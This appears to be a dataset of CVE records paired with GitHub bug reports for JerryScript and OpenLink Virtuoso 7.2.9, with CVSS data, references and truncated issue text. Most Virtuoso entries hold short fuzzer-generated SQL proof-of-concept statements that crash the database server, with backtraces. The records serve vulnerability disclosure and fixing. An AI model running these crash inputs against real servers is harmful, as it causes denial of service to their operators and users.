cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
54
997
cve_metrics
dict
cve_references
listlengths
1
68
cve_configurations
listlengths
1
5
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
76 values
url
stringlengths
37
79
cve_tags
listlengths
1
4
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
3
88.6k
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
56
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
37
62
issue_github_id
int64
128M
2.84B
issue_number
int64
1
128k
CVE-2023-31921
2023-05-12T14:15:10.007
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_big_uint_div_mod at jerry-core/ecma/operations/ecma-big-uint.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5068" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/5068
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7) Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-poi...
Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5068/comments
0
2023-04-08T14:19:33Z
2024-11-22T09:20:07Z
https://github.com/jerryscript-project/jerryscript/issues/5068
1,659,537,585
5,068
CVE-2023-31607
2023-05-15T15:15:11.573
An issue in the __libc_malloc component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1120" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1120
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1(x VARCHAR, k VARCHAR); CREATE INDEX t1i1 ON t1(c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c14,c15,c16,c17,c18,c19,c20,c21,c22,c23,c24,c25,c26,c27,c28,c29,c30,c31,c32,c33,c34,c35,c36,c37,c38,c39,c40,c41,c42,c43,c44,c45,c46,c47,c48,c49,c50,c51,c52,c53,c54,...
virtuoso 7.2.9 crashed at __libc_malloc
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1120/comments
0
2023-04-12T18:42:34Z
2023-04-14T08:12:11Z
https://github.com/openlink/virtuoso-opensource/issues/1120
1,665,064,064
1,120
CVE-2023-31608
2023-05-15T15:15:11.623
An issue in the artm_div_int component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1123" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1123
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL SELECT CAST('-9223372036854775808' AS INTEGER) / CAST('-1' AS SMALLINT); ``` backtrace: ```c #0 0xc227a4 (artm_div_int+0xf4) #1 0xc23766 (artm_vec+0x7d6) #2 0x7518c2 (code_vec_run_v+0x10e2) #3 0x7ac3ff (qn_input+0x38f) #4 0x7ac8a6 (qn_send_output+0x236) #5 0x81e...
virtuoso 7.2.9 crashed at artm_div_int
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1123/comments
0
2023-04-12T18:49:08Z
2023-04-14T08:12:12Z
https://github.com/openlink/virtuoso-opensource/issues/1123
1,665,072,694
1,123
CVE-2023-31609
2023-05-15T15:15:11.673
An issue in the dfe_unit_col_loci component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1126" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1126
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE b ( folders VARCHAR(80), folderid VARCHAR(80), parentid VARCHAR(80), rootid VARCHAR(80), c INTEGER, path VARCHAR(80), id VARCHAR(80), i VARCHAR(80), d VARCHAR(80), e VARCHAR(80), f ...
virtuoso 7.2.9 crashed at dfe_unit_col_loci
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1126/comments
1
2023-04-12T18:58:35Z
2023-04-17T19:06:54Z
https://github.com/openlink/virtuoso-opensource/issues/1126
1,665,085,302
1,126
CVE-2023-31610
2023-05-15T15:15:11.720
An issue in the _IO_default_xsputn component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1118" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1118
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t2(x VARCHAR, y VARCHAR, c VARCHAR); CREATE VIEW t2 AS SELECT * FROM t2; INSERT INTO t2 VALUES(8,8,RDF_SYS.xsd_hexBinary_fromBinary(SYSTEM_BASE64_ENCODE(zeroblob(200)))); ``` backtrace: ```c #0 0x7f87bcd56050 (_IO_default_xsputn+0xa0) #1 0x7f87bcd3b0f...
virtuoso 7.2.9 crashed at _IO_default_xsputn
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1118/comments
0
2023-04-12T18:33:19Z
2023-04-14T08:12:10Z
https://github.com/openlink/virtuoso-opensource/issues/1118
1,665,051,847
1,118
CVE-2023-31611
2023-05-15T15:15:11.770
An issue in the __libc_longjmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1119" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1119
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE hist ( cnt VARCHAR NOT NULL, y VARCHAR NOT NULL, z VARCHAR, PRIMARY KEY (cnt,y) ); CREATE TABLE t19d AS (SELECT * FROM hist UNION ALL SELECT 1234); ``` backtrace: ```c #0 0x7f523bf87dbe (__libc_longjmp+0xde) #1 0x5177d573a547bfaf -- no sym...
virtuoso 7.2.9 crashed at __libc_longjmp
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1119/comments
0
2023-04-12T18:38:29Z
2023-04-14T08:12:10Z
https://github.com/openlink/virtuoso-opensource/issues/1119
1,665,059,115
1,119
CVE-2023-31612
2023-05-15T15:15:11.813
An issue in the dfe_qexp_list component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1125" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1125
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 ( x VARCHAR, y VARCHAR ); SELECT IFNULL(MIN(x), -1), IFNULL(MAX(x), -1) FROM ( SELECT x FROM t1 UNION ALL SELECT NULL ) AS temp; ``` backtrace: ```c #0 0x737010 (dfe_qexp_list+0x40) #1 0x73711d (dfe_qexp_list+0x14d) #2 0x747...
virtuoso 7.2.9 crashed at dfe_qexp_list
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1125/comments
1
2023-04-12T18:52:59Z
2023-04-17T19:07:44Z
https://github.com/openlink/virtuoso-opensource/issues/1125
1,665,077,173
1,125
CVE-2023-31613
2023-05-15T15:15:11.867
An issue in the __nss_database_lookup component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1121" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1121
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 (c1 INT, c2 BINARY(100),c3 FLOAT); INSERT INTO t1 VALUES (100,'abcdefghij',3.0); CREATE TABLE t2 (c1 INT, c2 VARCHAR(100)); INSERT INTO t2 VALUES (2,'abcde'); UPDATE t1 SET c2 = (SELECT MAX(c1) FROM t2); ``` backtrace: ```c #0 0x7fd63dbe3a7d (__ns...
virtuoso 7.2.9 crashed at __nss_database_lookup
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1121/comments
0
2023-04-12T18:46:15Z
2023-04-17T09:13:45Z
https://github.com/openlink/virtuoso-opensource/issues/1121
1,665,069,177
1,121
CVE-2023-31614
2023-05-15T15:15:11.913
An issue in the mp_box_deserialize_string function in openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1117" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1117
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
## Description When running the following statement on an empty virtuoso-opensource database, the database just crashed: ```sql SELECT table_name as name, 'TABLE' as type, '' as parentname FROM information_schema.tables UNION SELECT column_name as name, data_type as type, table_name as parentname FROM informati...
virtuoso *crashed* after running a SELECT statement
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1117/comments
2
2023-04-10T17:55:59Z
2023-04-17T09:13:46Z
https://github.com/openlink/virtuoso-opensource/issues/1117
1,661,128,936
1,117
CVE-2023-31615
2023-05-15T15:15:11.963
An issue in the chash_array component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1124
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1(x INTEGER UNIQUE); CREATE TABLE k(v varchar(255), excluded varchar(255)); INSERT INTO t1(x, x, x, x, x, x, x) VALUES(16183,15638,6,0,5,2,0); SELECT 'one', t1.* FROM t1 LEFT JOIN k ON t1.x=k.v WHERE k.v IS NULL; ``` backtrace: ```c #0 0x4257c4 (chas...
virtuoso 7.2.9 crashed at chash_array
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1124/comments
0
2023-04-12T18:50:37Z
2023-04-14T12:55:18Z
https://github.com/openlink/virtuoso-opensource/issues/1124
1,665,074,357
1,124
CVE-2023-31616
2023-05-15T15:15:12.010
An issue in the bif_mod component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1122
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL SELECT MOD(-9223372036854775808, -1); ``` backtrace: ```c #0 0x66a32e (bif_mod+0xce) #1 0x74ae62 (sqlr_run_bif_in_sandbox+0x392) #2 0x79b598 (sqlp_patch_call_if_special_or_optimizable+0x1148) #3 0xccffe7 (scn3yyparse+0xc5d7) #4 0x6b995b (sql_compile_1+0x129b) #5...
virtuoso 7.2.9 crashed at bif_mod
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1122/comments
0
2023-04-12T18:47:44Z
2023-04-14T08:12:11Z
https://github.com/openlink/virtuoso-opensource/issues/1122
1,665,070,884
1,122
CVE-2023-31617
2023-05-15T15:15:12.057
An issue in the dk_set_delete component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1127" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1127
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE b ( folders VARCHAR(80), folderid VARCHAR(80), parentid VARCHAR(80), rootid VARCHAR(80), c INTEGER, path VARCHAR(80), id VARCHAR(80), i VARCHAR(80), d VARCHAR(80), e VARCHAR(80), f ...
virtuoso 7.2.9 crashed at dk_set_delete
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1127/comments
0
2023-04-12T19:01:25Z
2023-04-14T08:12:12Z
https://github.com/openlink/virtuoso-opensource/issues/1127
1,665,089,526
1,127
CVE-2023-31618
2023-05-15T15:15:12.110
An issue in the sqlc_union_dt_wrap component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1136" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1136
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL SELECT SUM(v), COUNT(*) FROM gstest_empty UNION ALL SELECT SUM(v), NULL FROM gstest_empty UNION ALL SELECT NULL, COUNT(*) FROM gstest_empty UNION ALL SELECT NULL, NULL ``` backtrace: ```c #0 0x81a65e (sqlc_union_dt_wrap+0x5e) #1 0x81a783 (sqlc_union_order+0x33...
virtuoso 7.2.9 crashed at sqlc_union_dt_wrap
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1136/comments
0
2023-04-12T19:34:10Z
2023-04-14T08:12:15Z
https://github.com/openlink/virtuoso-opensource/issues/1136
1,665,129,009
1,136
CVE-2023-31619
2023-05-15T15:15:12.170
An issue in the sch_name_to_object component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1133" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1133
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1(x VARCHAR, k VARCHAR, v VARCHAR); CREATE VIEW t1 AS SELECT x, x FROM t1; UPDATE t1 SET x = x + 100; ``` backtrace: ```c #0 0x6080d1 (sch_name_to_object+0x11) #1 0x7dcf6f (sqlc_update_searched+0x6f) #2 0x817cd1 (sqlc_update_view+0xaa1) #3 0x7ddad0...
virtuoso 7.2.9 crashed at sch_name_to_object
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1133/comments
1
2023-04-12T19:26:23Z
2023-04-14T08:41:03Z
https://github.com/openlink/virtuoso-opensource/issues/1133
1,665,120,116
1,133
CVE-2023-31620
2023-05-15T15:15:12.237
An issue in the dv_compare component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1128" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1128
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE element ( name VARCHAR(80), test1 VARCHAR(80), f1 VARCHAR(80), f2 VARCHAR(80), code INTEGER, t1 VARCHAR(80), a VARCHAR(80), example VARCHAR(80), b VARCHAR(80), c VARCHAR(80), folder...
virtuoso 7.2.9 crashed at dv_compare
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1128/comments
0
2023-04-12T19:03:51Z
2023-04-17T18:53:42Z
https://github.com/openlink/virtuoso-opensource/issues/1128
1,665,092,932
1,128
CVE-2023-31621
2023-05-15T15:15:12.300
An issue in the kc_var_col component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1130" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1130
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE brin_test(a INTEGER NOT NULL); INSERT INTO brin_test (a) VALUES(5); INSERT INTO brin_test (a) VALUES(5); ALTER TABLE brin_test ADD c1 VARCHAR(20) NOT NULL ; UPDATE brin_test SET a = a + 1 WHERE a = 5; ``` backtrace: ```c #0 0x5cfed5 (kc_var_col+0x1...
virtuoso 7.2.9 crashed at kc_var_col
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1130/comments
0
2023-04-12T19:18:19Z
2023-04-14T12:55:17Z
https://github.com/openlink/virtuoso-opensource/issues/1130
1,665,110,745
1,130
CVE-2023-31622
2023-05-15T15:15:12.347
An issue in the sqlc_make_policy_trig component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
